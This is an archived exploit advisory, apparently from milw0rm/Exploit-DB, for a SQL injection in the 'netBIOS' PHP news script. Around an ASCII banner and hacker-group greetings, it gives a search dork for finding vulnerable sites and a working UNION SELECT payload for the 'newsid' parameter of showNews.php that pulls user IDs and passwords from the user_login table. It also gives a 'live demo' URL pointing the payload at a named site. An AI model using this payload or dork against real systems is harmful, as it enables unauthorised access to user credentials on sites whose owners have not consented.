netBIOS - 'newsid' SQL Injection

EDB-ID:

5852

CVE:

N/A


Platform:

PHP

Published:

2008-06-18

#################################################################################################
#################################### Viva IslaM Viva IslaM ######################################
###                                                                                           ###
###                            rEm0te sql injction VulnErability                              ###
###                                                                                           ###
###                                  (Net bios script)                                        ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### AuTh0r : security fears team                                                              ###
###                                                                                           ###
### H0ME   : WwW.alsonaa.CoM                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name :  netBIOS                                                                    ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "Powered by netBIOS"                                                             ###
###                                                                                           ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        showNews.php?newsid=(sql)                                                          ###
###(sql):-10+union+select+1,concat_ws(0x3a3a,ul_id,ul_password),3,4,5,6,7,8,9,10+from+user_login/*                   
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://swtdemo.com/cms/php/showNews.php?newsid=-10+union+select+1,concat_ws(0x3a3a,ul_id,ul_password),3,4,5,6,7,8,9,10+from+user_login/*
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################
                                   -(:: !GreTzZ! ::)-
      : HaCkEr-EGy  :: Mr.sql ::  MusliMs HaCkErs  ::member of alsonaa.com :
#################################################################################################
#################################################################################################

# milw0rm.com [2008-06-18]